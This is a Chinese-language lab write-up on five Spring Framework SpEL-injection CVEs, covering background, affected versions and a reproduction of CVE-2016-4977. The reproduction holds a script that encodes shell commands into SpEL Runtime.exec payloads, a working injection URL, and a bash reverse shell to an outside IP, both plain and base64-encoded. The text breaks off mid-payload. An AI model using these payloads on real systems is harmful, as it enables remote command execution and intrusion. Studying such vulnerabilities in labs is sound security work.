Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
基础知识
Spring框架是由于软件开发的复杂性而创建的。Spring使用的是基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅仅限于服务器端的开发。从简单性、可测试性和松耦合性角度而言,绝大部分Java应用都可以从Spring中受益。
漏洞原理
CVE-2016-4977:Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。
CVE-2017-4971:Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
CVE-2017-8046:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中【实现RFC6902】(https://tools.ietf.org/html/rfc6902)),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。
CVE-2018-1270:spring messaging是基于sockjs(可以理解为一个通信协议),而sockjs适配多种浏览器:现代浏览器中使用websocket通信,老式浏览器中使用ajax通信。
连接后端服务器的流程,可以理解为: 用STOMP协议将数据组合成一个文本流,再用sockjs协议发送文本流,sockjs会选择一个合适的通道:websocket或xhr(http),与后端通信,使用http来复现漏洞,称之为“降维打击”。
CVE-2018-1273:Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
涉及版本
CVE-2016-4977:
- Spring Security OAuth 2.3到2.3.2
- Spring Security OAuth 2.2到2.2.1
- Spring Security OAuth 2.1到2.1.1
- Spring Security OAuth 2.0到2.0.14
CVE-2017-4971:
- Spring WebFlow 2.4.0 - 2.4.4
- 较旧的不受支持的版本也会受到影响
CVE-2017-8046:
- Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
- Spring Boot version < 2.0.0M4
- Spring Data release trains < Kay-RC3
CVE-2018-1270:
- Spring Framework 5.0 to 5.0.4.
- Spring Framework 4.3 to 4.3.14
- 已不支持的旧版本仍然受影响
CVE-2018-1273:
- Spring Data Commons 1.13至1.13.10(Ingalls SR10)
- Spring Data REST 2.6至2.6.10(Ingalls SR10)
- Spring Data Commons 2.0至2.0.5(Kay SR5)
- Spring Data REST 3.0至3.0.5(Kay SR5)
- 较旧的不受支持的版本也会受到影响
漏洞复现
CVE-2016-4977
启动环境:
http://your-ip:8080/oauth/authorize?response_type=${
233*233}&client_id=acme&scope=openid&redirect_uri=http://test
首先需要填写用户名和密码,我们这里填入admin:admin,发现返回结果为${}中的乘法被执行:
(1)创建文件
使用靶场自带的脚本:
// poc.py
#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
执行脚本,命令如下:
// 命令
python poc.py
Enter message to encode:touch /tmp/111
执行的记录如下:
poc如下:
// An highlighted block
/oauth/authorize?response_type=${
T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(116).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(49)))}&client_id=acme&scope=openid&redirect_uri=http://test
得到poc拼接到上面的${}位置,即可执行,burp suite记录如下:
成功执行:
(1)反弹
编码反弹语句(不编码的试了没有反弹成功):
bash -i >& /dev/tcp/目标 IP/2222 0>&1
// 编码后
bash -c {
echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS42OC42Ny4xMjUvMjIyMiAwPiYx}|{
base64,-d}|{
bash,-i}
在线编码工具:
http://www.jackson-t.ca/runtime-exec-payloads.html
将编码后的反弹命令再编码一下,得到攻击的poc
执行命令:
// GET包访问路径
/oauth/authorize?response_type=${
T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat